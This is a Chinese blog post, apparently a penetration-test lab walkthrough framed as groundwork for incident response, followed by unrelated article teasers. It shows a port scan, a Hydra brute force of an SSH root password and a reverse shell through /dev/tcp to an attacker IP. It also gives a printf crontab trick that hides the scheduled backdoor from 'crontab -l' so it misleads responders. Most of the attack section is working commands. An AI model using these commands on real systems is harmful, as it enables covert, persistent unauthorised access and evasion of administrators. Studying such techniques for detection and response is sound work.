渗透测试模拟实战（含靶场环境）——暴力破解、留crontab隐藏后men_"(crontab -l;printf \"* * * * * /bin/bash -c '/bin-程序员宅基地

技术标签：应急响应

本次实验主要是为了应急响应打基础，从攻击者的角度出发，知己知彼，百战不殆

一、环境搭建

目标服务器无WEB网站，
访问目标发现只有默认的一个apache的默认页面
IP地址：192.168.184.142
在这里插入图片描述
靶场环境、使用的工具，放在了知识星球中。

二、模拟攻击

2.1 扫描端口

使用nmap扫描

因为没有WEB网站，使用 nmap 扫描是否有开放的端口

nmap -sS 192.168.184.142

在这里插入图片描述
通过扫描结果发现，目标服务器开放了22与3306端口，其中22号端口是远程登录链接的可以进行暴力破解，3306端口是mysql数据库的端口，也是可以暴力破解的，本案例只演示 22 端口暴力破解

2.2 暴力破解拿到root密码

使用 hydra 爆破 ssh 登录密码
因为Linux服务器的账户默认都是root，一般不会更改，那么使用 hydra 爆破 ssh root账户登录密码

hydra.exe -l root -P C:\Users\Downloads\top1000.txt ssh://192.168.184.142
#-l 用户名
#-L 用户名字典的根路径
#-p 密码 
#-P 密码字典的根路径

使用弱口令排名前1000位的字典 top1000，进行爆破，稍等几分钟后，就爆破出来了密码为：1qaz2wsx3edc
在这里插入图片描述
使用 xshell 远程连接测试，发现成功登录

2.3 留crontab隐藏后men

好不容易拿下一个服务器，得留个后men以后经常使用，但是又不想让管理员轻而易举的发现该后men的位置，那就留一个crontab隐藏后men吧

crontab介绍：
crontab：定时任务，是用来定期执行程序的命令，crond 命令每分钟会定期检查是否有要执行的工作，如果有要执行的工作便会自动执行该工作。
那么把后men放在定时任务中，就会定期执行后men，比如一分钟执行一次、一小时执行一次

crontab查看定时任务命令：

crontab -l

在这里插入图片描述
**意思：**每分钟执行一次写abc.txt文件，文件内容是$(date) aaa

接下来需要留crontab隐藏后men了

第一步：
植入crontab隐藏后men需要的文件

1.sh文件内容

#!/bin/bash
bash -i >& /dev/tcp/192.168.184.145/5555 0>&1

**意思是：**反弹shell到IP地址：192.168.184.145

2.sh文件内容

(crontab -l;printf "* * * * * /root/1.sh;\rno crontab for `whoami`%100c\n")|crontab -

**意思是：**建立crontab隐藏后men
注意： /root/1.sh 的位置是你把1.sh文件下载道德位置，本案例是计划下载到 /root 目录下，根据自己的实际情况进行修改即可

第二步：
我们把1.sh、2.sh 文件放在本地搭建的web服务上，下载到受害主机
在这里插入图片描述
下载完1.sh与2.sh文件后，给bash文件添加执行权限

chmod 777 1.sh
chmod 777 2.sh

在这里插入图片描述
第三步：

kali打开监听端口，等待shll连接
在这里插入图片描述

第四步：

查看现在是否含有定时任务，发现目标系统并没有定时任务

crontab -l

在这里插入图片描述
第五步：

最后执行2.sh文件，如果2.sh的命令成功执行则会返回如下图所示的提示“no crontab for root”，虽然是提示 root账户没有定时任务，但其实定时任务已经成功创建，

./2.sh

在这里插入图片描述
过一分钟之后，kali监听的5555端口，会收到shell连接消息，crontab隐藏后men创建成功（其中ls-l 查看的就是受害者服务的内容）
注意： 在shell中有些命令不能执行，

第六步：
接下来查看一下隐藏后men是不是真的隐藏了

crontab -l

在这里插入图片描述
发现真的是没有定时任务

虽然使用crontab -l没有发现定时任务，但是定时任务已经成功植入，只有通过在 /var/spool/cron 目录下 vi root 才可以看到真实的定时任务，连cat都看不到，隐藏的很好，会给应急响应人员带来一定程度的误导

在这里插入图片描述
更多web安全工具、存在漏洞的网站搭建源码、渗透测试思路，收集整理在知识星球。也可搜索关注微信公众号：W小哥

本文链接：https://blog.csdn.net/weixin_40412037/article/details/115910635

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

元素选择器之排除特定元素_input排他选择器-程序员宅基地

文章浏览阅读2.1k次。需求如下:该搜索框是对整个页面的input检索，但与弹出层中的input冲突博主几经辗转简单处理解决问题，思路如下：排除掉特定class的input。代码如下：$('input:not(.pop)', this.footer()).on('keyup change', function () { if (that.search() !== th..._input排他选择器

使用JAXB进行XML与JavaBean的转换（支持泛型）_jaxb 泛型-程序员宅基地

文章浏览阅读5.6k次，点赞6次，收藏20次。看到别人有个1024的勋章，特意留了一篇在今年的10.24日，看看会不会获得。在日常开发中可能涉及接口之间的相互调用，虽然在现在微服务的理念推广下，很多公司都采用轻量级的JSON格式做为序列化的格式，但是不乏有些公司还是有一些XML格式的报文，最近就在对接某个合作方的时候遇到了XML报文。在JSON报文爽快的转换下很难试用一个一个的拿报文参数，还是希望能直接将报文转换成Bean。接下来就了解到..._jaxb 泛型

python numpy学习笔记_ndarray的位置-程序员宅基地

文章浏览阅读1.2k次。numpy的主要数据对象是多维数组，其中包含相同类型的元素，通常是数字类型，每个元素都有一个索引。使用numpy前通常要导入包。import numpy as np目录类型维度创建运算索引和切片类型numpy的数组被称为ndarray。numpy.array只处理一维数组，而ndarray对象才提供更多功能。a = np.array([[1, 2, 3], [4, 5, 6]])type(a) # <class 'numpy.ndarray'>dtype属性可以获得元素的数_ndarray的位置

我的世界java版gamemode指令_《我的世界》Java版常用指令代码大全！你想要的都在这里了！...-程序员宅基地

文章浏览阅读1.6w次。还在苦于网上找到的一些指令已经不适用了吗？还在苦于有些地方的指令有误吗？还在苦于有些地方整理的指令不够全面吗？那么你来对地方了！小编为大家整理了《我的世界》原版游戏常用的指令，这些基本足以满足各位的基本需求了！大家来一起看看吧！注：表示的是必须输入的部分，[方括号]表示的是可选择性输入的部分基本命令列表命令描述/?/help的替代命令，提供命令使用帮助。/ban + 玩家名字将玩家加入封禁列表。/..._gamemode指令java

Spring Boot 结合shiro做第三方登录验证_shiro 第三方token登录-程序员宅基地

文章浏览阅读1.5w次，点赞3次，收藏3次。Spring Boot 结合shiro做第三方登录验证1、首先，说一下我的具体实现思路。在做spring boot拦截器的过程中，开始我准备用spring security来实现，但是研究了一段时间之后发现spring security的集成度太高，需要修改的东西比较多，而且对它本身的使用方法不是很了解，后来转而使用Apache shiro。由于是第三方登录，是不需要我来验证密码的。最开始，我陷入了_shiro 第三方token登录

labelme UnicodeDecodeError: ‘gbk‘ codec can‘t decode byte 0xaf in position 227: illegal mult_file "c:\rgzn\labelme-main\setup.py", line 91, in -程序员宅基地

文章浏览阅读1.9k次，点赞4次，收藏4次。[INFO ] __init__:get_config:71 - Loading config file from:C:\Users\xxx\.labelmercTraceback (most recent call last): File .... line 191, in <module> main() File ...., line 145, in main config = get_config(config_file_or_yaml, config_fro_file "c:\rgzn\labelme-main\setup.py", line 91, in main if sys.argv[1] == "re